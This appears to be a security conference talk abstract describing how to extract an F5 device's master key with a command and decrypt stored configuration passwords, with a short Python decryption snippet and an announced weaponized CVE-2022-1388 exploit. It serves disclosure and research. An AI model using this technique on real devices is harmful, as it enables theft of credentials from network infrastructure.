2025-08-05 –, Tuscany
F5 load balancers and other products store secrets in configuration files encrypted by a unit specific master key. This talk describes how with access to an F5 device via an exploit or legitimate access the master key can be extracted and configuration passwords decrypted. This talk will also share a weaponized version of an F5 exploit with the added functionality. These techniques are not documented however the technique was determined through a careful reading of the documentation and manipulation of the data storage formats. Learn the secrets of the $M$ password storage format today.
This technique was developed in 2022 by X-Force and withheld from broader distribution for several years to protect the broader community. Now that its 2025 the weaponized version of the CVE-2022-1388 exploit will be released (we modified a zephyphish exploit), the gist of it is this:
-
retrieve f5 master key from unit with
f5mku -Kand that gives the master key -
the password storage is effectively AES-128 in Electronic Codebook Mode, as demonstrated with this python snippet
# get the master key from the F5
master_key_str = get_master_key(target_url)
# decode the master key
master_key_data = base64.b64decode(master_key_str)
# its basically salted AES in ECB mode
aes = AES.new(master_key_data, AES.MODE_ECB)
# loop over the goods to decrypt
for ciphertext in password_list:
# grab everything past $M$xx$ which is the cyphertext
cipher_data = base64.b64decode(ciphertext[6:])
# we store in cleartext because we need to chop off the salt and decode it
cleartext = aes.decrypt(cipher_data)
# displaytext = decoded text with salt
displaytext = cleartext.decode("utf-8")
# xtext is what we finally show after the salt has been removed, the value of xx above
xtext = displaytext.removeprefix(ciphertext[3:5])
# show the final text
print("Ciphertext: " + str(ciphertext) + " Cleartext: " + xtext)
return
This really could be 10 minutes but I'm going to add some history to the talk
Dustin Heywood otherwise known as EvilMog® is a hacker, mostly retired member of "Team Hashcat", and Executive Managing Hacker / Senior Technical Staff Member at IBM X-Force. He has been cracking passwords since 2009, and is the developer of the ntlmv1-multi tool. In his spare time he collects life time entry badges to conferences.